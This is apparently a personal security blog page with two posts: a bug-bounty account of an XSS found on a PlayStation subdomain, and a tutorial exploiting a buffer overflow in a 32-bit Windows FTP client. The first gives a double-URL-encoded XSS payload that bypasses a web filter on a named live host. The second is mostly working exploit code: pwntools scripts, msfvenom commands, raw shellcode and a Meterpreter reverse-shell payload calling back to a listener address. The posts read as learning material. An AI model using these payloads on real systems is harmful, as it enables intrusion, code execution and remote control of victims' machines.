Menu

Month: June 2020

Story of Playstation(Sony) XSS

Hello all!!! Today i decided to share my finding of xss on subdomain of playstation. It was 1 year ago i think, i started hunting bug on sony websites and first i found directory indexing on [ https://blog.latam.playstation.com/wp-content/ https://blog.latam.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp/wp-includes/ https://blog.us.playstation.com/wp-content/ https://blog.br.playstation.com/wp/wp-includes/ https://blog.br.playstation.com/wp-content/ https://rd.playstation.com/ ]

Then i reported to sony and they didn’t accept because they could not find any impact.I didnt understand why they said that :3 and i was like okay.Then I tried to dig more into the folders and found this page [ https://blog.latam.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html ]. I found Qunit 1.21.0 on the page and i decided to find exploit on google. Then i found this page.

There are two pocs and the 2nd poc shows that the parameter testId is vulnerable to xss.So i decided to give it a try.First i injected payload <svg onload=alert(1)> and waf filters it.Then i fuzzed a lot and at last boom! double url encoding bypass the waf.

So the POC link is [ https://blog.us.playstation.com/wp-content/mu-plugins/fieldmanager/tests/js/index.html?testId=%25%33%63%25%37%33%25%37%36%25%36%37%25%32%30%25%36%66%25%36%65%25%36%63%25%36%66%25%36%31%25%36%34%25%33%64%25%36%31%25%36%63%25%36%35%25%37%32%25%37%34%25%32%38%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%36%34%25%36%66%25%36%64%25%36%31%25%36%39%25%36%65%25%32%39%25%33%65 ].

Then i reported the bug and they replied back after 3 months and rewarded a swag that was never shipped to me :V .

Thats my story of xss on playstation. Hope you like it. Thanks!!!

Windows Buffer Overflow (32bit ftp)

Today I will show how to exploit the 32bit windows buffer overflow .This is my first post of writing blog post.

What is buffer mean?

Buffers are areas of memory set aside to hold data, often while moving it from one section of a program to another, or between programs

Buffer Overflow?

A buffer overflow occurs when a program or process attempts to write more data to a fixed length block of memory, or buffer, than the buffer is allocated to hold. Since buffers are created to contain a defined amount of data, the extra data can overwrite data values in memory addresses adjacent to the destination buffer unless the program includes sufficient bounds checking to flag or discard data when too much is sent to a memory buffer.

Introduction

There is alot of tutorials about this 32bit ftp windows buffer overflow But I want to use the modern technique while the exploit the windows buffer overflow.Let’s start.

Requirements

  • U can download the 32bit ftp exe file here
  • U can test any windows version.
  • Immunity Debugger
  • Pwntools

First u need to load the 32bit ftp in immunity debugger.

File > open > select the ftp file and open.

When i try run via debugger ,its ask me ftp server ip and port.So we need create the ftp server and let that client ftp connect to us.Let create the simple ftp server using pwntools.

from pwn import *

l = listen(21)

payload ="Sent some strings"

_ = l.wait_for_connection()

l.sendline("220 " + payload)

sudo python test.py

Important ; Once u run the debgger ,every time u need to restart the debugger by pressing ctr+f2 or Debug tab > restart.

Next step . let crash the client ftp with a bunch of “A”

from pwn import *
l = listen(21)

payload ="A"*1000

_ = l.wait_for_connection()

l.sendline("220"+payload)

Great!. It crash . When we focus the EIP in debugger the Stack fill with alot of “A” .(EIP 41414141)

All of the registers have been overwritten by 41 (hex for A). This means that we have a buffer overflow vulnerability on our hands and we have proven that we can overwrite the EIP. At this point, we know that the EIP is located somewhere between 1 and 1000 bytes, but we are not sure where it’s located exactly. What we need to do next is figure out exactly where the EIP is located (in bytes) and attempt to control it.

Next step is to find offset .Let’s find .

from pwn import *

l = listen(21)

payload =cyclic(1000)

_ = l.wait_for_connection()

l.sendline("220 " + payload)

Select the EIP address (786A6161) and find with cyclic_find()

Offset = 989

To execute shellcode, we need to find a JMP/CALL ESP memory address, so EIP will read it and jump to the memory address stored in ESP. When you loaded the FTP client program in Immunity, you saw the kernel32.dll module was also loaded.So we jump that address let the shellcode run.

!mona jmp -r esp -m kernel

U will see 3 jmp esp addresses and 2 call esp addresses .U can use one of them .All addresses is worked.So, let jump this addresses with shellcode.Firstly I will execute the calculator .After this i will show how to generate reverse shell and exploit this.Let’s Pop calculator.

To generate the calc using msfvenom

msfvenom -a x86 –platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c -b “\x00”

Note: This ftp doesn’t contains any bad characters .So I will not show u how find bad characters in easy way and how avoid them.But I will write in another post .

Ths goal is Buffer + jmp esp + NOP + shellcode .

Why NOP contains in this exploit?

Some attacks consist of making the program jump to a specific address and continue running from there. The injected code has to be loaded previously somehow in that exact location.

Stack randomization and other runtime differences may make the address where the program will jump impossible to predict, so the attacker places a NOP sled in a big range of memory. If the program jumps to anywhere into the sled, it will run all the remaining NOPs, doing nothing, and then will run the payload code, just next to the sled.

The reason the attacker uses the NOP sled is to make the target address bigger: the code can jump anywhere in the sled, instead of exactly at the beginning of the injected code.

A 128-byte NOP sled is just a group of NOP intructions 128 bytes wide.

NOTE #1: NOP (No-OPeration) is an instruction available in most (all?) architectures that does nothing, other than occupying memory and some runtime.

NOTE #2: in architectures with variable length instructions, a NOP instruction is usually just one byte in length, so it can be used as a convenient instruction padding. Unfortunately, that also makes it easy to do a NOP sled.

Ref : https://stackoverflow.com/questions/14760587/how-does-a-nop-sled-work

Let’s go.

from pwn import *

payload ="\x41"*989

#jmp esp address

payload +=p32(0x765A3132)
payload += "\x90" * 30
payload += (

"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
"\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
"\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
"\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
)
l = listen(21)
_ = l.wait_for_connection()

l.sendline("220 " + payload)

Ogay. cacl.exe pop up successfully .now I will generate the reverse shellcode using msfvenom.Coz i wanna control this machine ,popping calc isn’t enough for me :D….

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.255.232 LPORT=4444 -a x86 –platform win -e x86/alpha_mixed -f c -b ‘\x00’

Put the result in python script and run .

from pwn import *
payload ="\x41"*989
#jmp esp address
payload +=p32(0x771F3132)
payload += "\x90"*30
payload += (
"\x89\xe6\xd9\xea\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
"\x59\x6c\x6a\x48\x4b\x32\x75\x50\x43\x30\x73\x30\x65\x30\x6c"
"\x49\x6a\x45\x54\x71\x79\x50\x62\x44\x4c\x4b\x66\x30\x70\x30"
"\x4e\x6b\x53\x62\x44\x4c\x4c\x4b\x31\x42\x54\x54\x4c\x4b\x63"
"\x42\x44\x68\x46\x6f\x4c\x77\x53\x7a\x55\x76\x44\x71\x59\x6f"
"\x4c\x6c\x65\x6c\x30\x61\x33\x4c\x46\x62\x46\x4c\x35\x70\x4a"
"\x61\x5a\x6f\x56\x6d\x43\x31\x4a\x67\x58\x62\x49\x62\x61\x42"
"\x30\x57\x6e\x6b\x62\x72\x42\x30\x6c\x4b\x30\x4a\x67\x4c\x6c"
"\x4b\x62\x6c\x66\x71\x30\x78\x49\x73\x57\x38\x46\x61\x5a\x71"
"\x72\x71\x6c\x4b\x61\x49\x71\x30\x37\x71\x6b\x63\x6c\x4b\x37"
"\x39\x57\x68\x79\x73\x45\x6a\x30\x49\x4c\x4b\x64\x74\x4e\x6b"
"\x67\x71\x79\x46\x30\x31\x39\x6f\x6e\x4c\x69\x51\x5a\x6f\x76"
"\x6d\x36\x61\x6b\x77\x67\x48\x59\x70\x73\x45\x38\x76\x54\x43"
"\x63\x4d\x7a\x58\x45\x6b\x51\x6d\x44\x64\x73\x45\x6d\x34\x46"
"\x38\x6e\x6b\x50\x58\x64\x64\x76\x61\x69\x43\x35\x36\x4e\x6b"
"\x44\x4c\x62\x6b\x6e\x6b\x52\x78\x75\x4c\x43\x31\x4a\x73\x4c"
"\x4b\x47\x74\x6e\x6b\x77\x71\x4e\x30\x4b\x39\x31\x54\x65\x74"
"\x55\x74\x43\x6b\x43\x6b\x35\x31\x51\x49\x63\x6a\x50\x51\x4b"
"\x4f\x4b\x50\x71\x4f\x51\x4f\x50\x5a\x6c\x4b\x62\x32\x5a\x4b"
"\x4e\x6d\x63\x6d\x72\x48\x56\x53\x55\x62\x73\x30\x53\x30\x35"
"\x38\x34\x37\x70\x73\x67\x42\x63\x6f\x51\x44\x42\x48\x50\x4c"
"\x44\x37\x54\x66\x35\x57\x6e\x69\x58\x68\x69\x6f\x68\x50\x6c"
"\x78\x6c\x50\x46\x61\x33\x30\x53\x30\x46\x49\x69\x54\x46\x34"
"\x36\x30\x75\x38\x46\x49\x6f\x70\x70\x6b\x35\x50\x4b\x4f\x4b"
"\x65\x43\x5a\x46\x6a\x32\x48\x46\x6a\x76\x69\x69\x6f\x58\x68"
"\x45\x38\x37\x72\x57\x70\x44\x51\x63\x6c\x6e\x69\x49\x76\x66"
"\x30\x72\x70\x42\x70\x56\x30\x37\x30\x56\x30\x57\x30\x32\x70"
"\x51\x78\x68\x6a\x64\x4f\x69\x4f\x79\x70\x49\x6f\x49\x45\x7a"
"\x37\x72\x4a\x32\x30\x50\x56\x31\x47\x62\x48\x7a\x39\x6d\x75"
"\x53\x44\x33\x51\x69\x6f\x79\x45\x4b\x35\x4f\x30\x62\x54\x57"
"\x7a\x6b\x4f\x62\x6e\x43\x38\x71\x65\x7a\x4c\x69\x78\x63\x57"
"\x65\x50\x65\x50\x33\x30\x43\x5a\x63\x30\x63\x5a\x34\x44\x53"
"\x66\x30\x57\x42\x48\x44\x42\x5a\x79\x6b\x78\x31\x4f\x49\x6f"
"\x7a\x75\x6e\x63\x79\x68\x63\x30\x53\x4e\x76\x56\x4c\x4b\x55"
"\x66\x63\x5a\x47\x30\x65\x38\x63\x30\x34\x50\x55\x50\x35\x50"
"\x61\x46\x63\x5a\x73\x30\x33\x58\x53\x68\x6f\x54\x51\x43\x5a"
"\x45\x39\x6f\x7a\x75\x4d\x43\x72\x73\x71\x7a\x63\x30\x31\x46"
"\x43\x63\x71\x47\x52\x48\x63\x32\x79\x49\x39\x58\x43\x6f\x69"
"\x6f\x6b\x65\x4c\x43\x6b\x48\x35\x50\x33\x4d\x65\x78\x52\x78"
"\x35\x38\x55\x50\x63\x70\x35\x50\x47\x70\x50\x6a\x77\x70\x70"
"\x50\x43\x58\x56\x6b\x36\x4f\x56\x6f\x76\x50\x79\x6f\x49\x45"
"\x36\x37\x32\x48\x34\x35\x72\x4e\x42\x6d\x73\x51\x39\x6f\x6a"
"\x75\x31\x4e\x33\x6e\x69\x6f\x66\x6c\x66\x44\x44\x4f\x4e\x65"
"\x42\x50\x39\x6f\x49\x6f\x69\x6f\x59\x79\x6f\x6b\x6b\x4f\x39"
"\x6f\x59\x6f\x56\x61\x6a\x63\x76\x49\x49\x56\x64\x35\x59\x51"
"\x69\x53\x6f\x4b\x78\x70\x6c\x75\x6c\x62\x70\x56\x63\x5a\x63"
"\x30\x61\x43\x49\x6f\x5a\x75\x41\x41"
)
l = listen(21)
_ = l.wait_for_connection()
l.sendline("220 " + payload)

Wait for connection in another terminal .

Gotcha..!!!

Let Break !

Exploit development is the long way journey .It’s endless, We just need to run. πŸ˜€ πŸ˜€

If u face any trouble during testing .Just ping me.

./ht00lay

Scroll to top